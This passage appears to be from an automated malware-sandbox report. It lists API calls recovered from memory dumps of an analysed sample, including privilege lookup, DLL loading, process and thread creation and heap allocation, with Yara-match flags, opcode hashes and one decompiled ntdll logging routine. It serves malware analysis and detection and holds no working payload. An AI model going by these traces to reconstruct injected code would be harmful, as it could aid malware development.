                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: e4ed60e49faf2e329894cd13f7d4401b445ff0e3a96ded054f12627992c73196
                                                                          • Instruction ID: 74d3c6e7ebd9c2c2d9b637668fdfadb9f59237f7a673e980971f089b84ab35b5
                                                                          • Opcode Fuzzy Hash: e4ed60e49faf2e329894cd13f7d4401b445ff0e3a96ded054f12627992c73196
                                                                          • Instruction Fuzzy Hash: 15F0E931BD022536E62256509C03FBE7B58AF44F10F15005BFF04FA1C0E694691246E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 025B8A31, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,025ACFD2,025ACFD2,?,00000000,?,?), ref: 025B8A70
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, Offset: 025A0000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 06eeb676ffc238fba7826ebb45b75edcff59df0557e7d9ffd74f519ea1162436
                                                                          • Instruction ID: 9a842e091264c3603b75045fb7a70c91066951ed55c1e2bf7a531b5e7ba022be
                                                                          • Opcode Fuzzy Hash: 06eeb676ffc238fba7826ebb45b75edcff59df0557e7d9ffd74f519ea1162436
                                                                          • Instruction Fuzzy Hash: 8F0121B52042446FCB15EFA4DC89DE73BACEF82320F144989FD8917202C634E914CBB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 025A9B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 025A9BC2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, Offset: 025A0000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                          • Instruction ID: efeee11108523cd05ccd054805dfd4a5793225c0c91eed25301ac01ead38b587
                                                                          • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                          • Instruction Fuzzy Hash: 69011EB5D0020EABDB10DAA4DC82FDDB7B9AF54308F104595ED0997240F671EB14CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 025B8950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 025B89A4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, Offset: 025A0000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                          • Instruction ID: 26e1f3fbbb065836cc228c342480bc12330fae362c128fa9aae476f54074ec13
                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                          • Instruction Fuzzy Hash: 3D01B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 025B7420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,025ACD00,?,?), ref: 025B745C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, Offset: 025A0000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: 34a1b1dcf166439898ace659775bf258f25437e47bcb71fafeaaa03b101821b9
                                                                          • Instruction ID: 092be1d8f5feff579530d154c29b7e3944c2e69ce46adbb88b95e01df029f32a
                                                                          • Opcode Fuzzy Hash: 34a1b1dcf166439898ace659775bf258f25437e47bcb71fafeaaa03b101821b9
                                                                          • Instruction Fuzzy Hash: 69E06D333812143AE2216599EC02FE7B69CDBC5B25F140066FA0DEA2C0D595F80146A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 025B8A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,025ACFD2,025ACFD2,?,00000000,?,?), ref: 025B8A70
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, Offset: 025A0000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                          • Instruction ID: 0ea844ab4af9f26b969e4ed15d1ba56a7eac59b4ca83e62a84ef4f60815890c4
                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                          • Instruction Fuzzy Hash: ABE01AB12002086BDB14DF49CC85EE737ADAF89650F018154BE0857241C930E8108BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 025B88A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(025B3546,?,025B3CBF,025B3CBF,?,025B3546,?,?,?,?,?,00000000,00000000,?), ref: 025B88CD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, Offset: 025A0000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                          • Instruction ID: 8bb0b84b712b199a55be8dc316440e567ea899bfbf676625a97e889ad3cdf636
                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                          • Instruction Fuzzy Hash: 57E012B1200208ABDB18EF99CC45EA777ADAF88650F118558BE085B241C630F910CAB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 025AD440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,025A7C93,?), ref: 025AD46B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.509955285.00000000025A0000.00000040.00020000.sdmp, Offset: 025A0000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                                          • Instruction ID: c01a45a87c11a890df859073a71b72f555ef07bfb28fa330be217cd007ab437a
                                                                          • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                                          • Instruction Fuzzy Hash: F4D0A7757503083BE610FAA8DC03F6632CD6B44B04F494074F949E73C3DA60F4004565
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0467967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.512380476.0000000004610000.00000040.00000001.sdmp, Offset: 04610000, based on PE: true
                                                                          • Associated: 0000000E.00000002.513587854.000000000472B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000E.00000002.513603550.000000000472F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2e593186a2c6a10336091439238265dc784887dcdedc1a94c797241e12ae0dd4
                                                                          • Instruction ID: dd56b1f7264be8b938b109ac039d2749152692c69fc01a4a96bc5641f84502e1
                                                                          • Opcode Fuzzy Hash: 2e593186a2c6a10336091439238265dc784887dcdedc1a94c797241e12ae0dd4
                                                                          • Instruction Fuzzy Hash: D9B02BF19010C0C5F700EB604608F173A0077F0300F12C111D1020240A0338D080F1B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 046CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E046CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0467CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E046C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E046C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                          0x046cfdda
                                                                          0x046cfde2
                                                                          0x046cfde5
                                                                          0x046cfdec
                                                                          0x046cfdfa
                                                                          0x046cfdff
                                                                          0x046cfe0a
                                                                          0x046cfe0f
                                                                          0x046cfe17
                                                                          0x046cfe1e
                                                                          0x046cfe19
                                                                          0x046cfe19
                                                                          0x046cfe19
                                                                          0x046cfe20
                                                                          0x046cfe21
                                                                          0x046cfe22
                                                                          0x046cfe25
                                                                          0x046cfe40

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 046CFDFA
                                                                          Strings
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 046CFE2B
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 046CFE01
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.512380476.0000000004610000.00000040.00000001.sdmp, Offset: 04610000, based on PE: true
                                                                          • Associated: 0000000E.00000002.513587854.000000000472B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 0000000E.00000002.513603550.000000000472F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: 33cf1600d6e565e152101524d1d6c9e150e58566bb143341d1a8cd5bb8bbae08
                                                                          • Instruction ID: 2198ee41d8aa3505381ce29fab15045ea5739d864554eb3bddd9fee208ab4542
                                                                          • Opcode Fuzzy Hash: 33cf1600d6e565e152101524d1d6c9e150e58566bb143341d1a8cd5bb8bbae08
                                                                          • Instruction Fuzzy Hash: 6CF0F672240611BFE6241A45DC0AF33BB5AEB44730F244318F628561E1FA62F8609AF8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%